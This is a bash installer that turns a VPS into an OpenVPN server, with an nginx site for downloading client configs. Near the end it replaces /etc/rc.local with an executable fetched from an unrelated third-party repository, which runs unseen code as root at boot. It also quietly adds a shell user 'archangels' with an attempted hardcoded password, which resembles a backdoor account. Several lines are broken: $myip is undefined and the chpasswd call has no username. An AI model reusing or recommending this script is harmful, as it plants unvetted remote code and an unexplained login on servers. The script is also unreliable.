#!/bin/bash
# OpenVPN Ports
OpenVPN_Port1='1103'
OpenVPN_Port2='25222'
Ohp_Port='7752'
Squid_Port1='8000'
Squid_Port2='3128'
Squid_Port3='60000'
OvpnDownload_Port='85'
MyVPS_Time='Asia/Kuala_Lumpur'
#############################
 apt-get update
 apt-get upgrade -y
 apt-get install nginx 

  # Creating nginx config for our ovpn config downloads webserver
 cat <<'myNginxC' > /etc/nginx/conf.d/bonveio-ovpn-config.conf
# My OpenVPN Config Download Directory
server {
 listen 0.0.0.0:myNginx;
 server_name localhost;
 root /var/www/openvpn;
 index index.html;
}
myNginxC

 # Setting our nginx config port for .ovpn download site
 sed -i "s|myNginx|$OvpnDownload_Port|g" /etc/nginx/conf.d/bonveio-ovpn-config.conf

 # Removing Default nginx page(port 80)
 rm -rf /etc/nginx/sites-*

 # Creating our root directory for all of our .ovpn configs
 rm -rf /var/www/openvpn
 mkdir -p /var/www/openvpn
 # rm /var/www/openvpn/index.html

wget https://raw.githubusercontent.com/89870must73/DEB/main/index.html
cp index.html /var/www/openvpn

#  openvpn
apt-get -y install openvpn
cd /etc/openvpn/
wget -O openvpn.tar "https://raw.githubusercontent.com/Vpaproject/-/main/openvpn.tar"
tar xf openvpn.tar;rm openvpn.tar
wget -O /etc/rc.local "https://raw.githubusercontent.com/guardeumvpn/Qwer77/master/rc.local"
chmod +x /etc/rc.local
# etc
wget -O /var/www/openvpn/tcp.ovpn "https://raw.githubusercontent.com/Vpaproject/-/main/client.ovpn"
wget -O /var/www/openvpn/udp.ovpn "https://raw.githubusercontent.com/Vpaproject/-/main/client1.ovpn"
wget -O /var/www/openvpn/ssl.ovpn "https://raw.githubusercontent.com/Vpaproject/-/main/ssl.ovpn"
wget -O /var/www/openvpn/ohp.ovpn "https://raw.githubusercontent.com/Vpaproject/-/main/ohp.ovpn"
wget -O /var/www/openvpn/client3.ovpn "https://gakod.com/debian/client3.ovpn"
sed -i 's/AcceptEnv/#AcceptEnv/g' /etc/ssh/sshd_config
sed -i "s/ipserver/$myip/g" /var/www/openvpn/tcp.ovpn
sed -i "s/ipserver/$myip/g" /var/www/openvpn/udp.ovpn
sed -i "s/ipserver/$myip/g" /var/www/openvpn/ssl.ovpn
sed -i "s/ipserver/$myip/g" /var/www/openvpn/ohp.ovpn
useradd -m -g users -s /bin/bash archangels
echo "7C22C4ED" | chpasswd
echo "UPDATE DAN INSTALL SIAP 99% MOHON SABAR"
